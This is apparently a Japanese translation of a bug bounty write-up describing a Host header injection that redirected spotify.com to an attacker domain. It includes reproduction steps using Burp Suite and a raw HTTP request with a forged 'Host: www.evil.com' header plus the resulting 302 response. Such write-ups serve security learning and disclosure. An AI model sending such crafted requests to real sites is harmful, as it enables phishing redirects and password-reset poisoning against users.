「Host Header Injection / Redirect on Spotify — Bounty $200」からHost Header Injectionを学ぶ

ソース:

mufazmi.medium.com

脆弱性:Host Header Injection

 

訳:

私が調査対象として選んだのは、世界で最も人気のある音楽ストリーミング プラットフォームの 1 つである Spotify で。

最初にいくつか調査した結果、セキュリティの抜け穴、つまり Web サイトの完全性を損なう可能性のある脆弱性を発見し。

 

脆弱性: ホスト ヘッダー インジェクション

私が発見した脆弱性は「ホストヘッダーインジェクション」に関するもので。
本質的には、HTTP リクエストのホスト ヘッダーを操作できるようになり、Web サイトが意図しないドメインにリダイレクトされる可能性があり。
たとえば、攻撃者は、spotify.com にアクセスする代わりに、別の悪意のあるドメインへのリダイレクトを強制する可能性があって。

この脆弱性の影響は、Web サイトのバックエンド アプリケーション コード内でホスト ヘッダーがどのように使用されるかによって決まって。
コードが URL で使用されているホスト名を参照している場合、悪用の道が開かれ。
攻撃者はハイパーリンクを改ざんしたり、パスワード リセット ページを操作したり、機密情報を悪意のあるドメインにリダイレクトしたりする可能性があり。

 

再現手順:

私がこの脆弱性を発見した方法についての簡単なガイドは次のとおりで。

1. Burp Suite や Web ブラウザなどのツールを使用してテスト環境をセットアップします。

2. 対象の Web サイト: https://www.spotify.com にアクセスします。

3. Burp Suite を使用して HTTP リクエストをインターセプトします。

4. 悪意のあるペイロードをホスト ヘッダーに挿入します。

5. リクエストを転送します。

 

その結果、Web サイトは指定された悪意のあるドメインに直接リダイレクトされます。

 

ペイロード

GET /.. HTTP/2
Host: www.evil.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

 

レスポンス:

HTTP/2 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Location: https://www.evil.com/
Content-Length: 218
Date: Mon, 14 Mar 2022 00:46:08 GMT
Alt-Svc: clear

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.evil.com/">here</A>.
</BODY></HTML>

Spotify のホスト ヘッダー インジェクションの脆弱性を発見するという私の旅は、Web セキュリティの強化においてセキュリティ研究者が果たす重要な役割を強調し。
責任ある情報開示は、より安全なデジタル環境を構築するための研究者と組織の協力的な取り組みで。

 

ほなほな。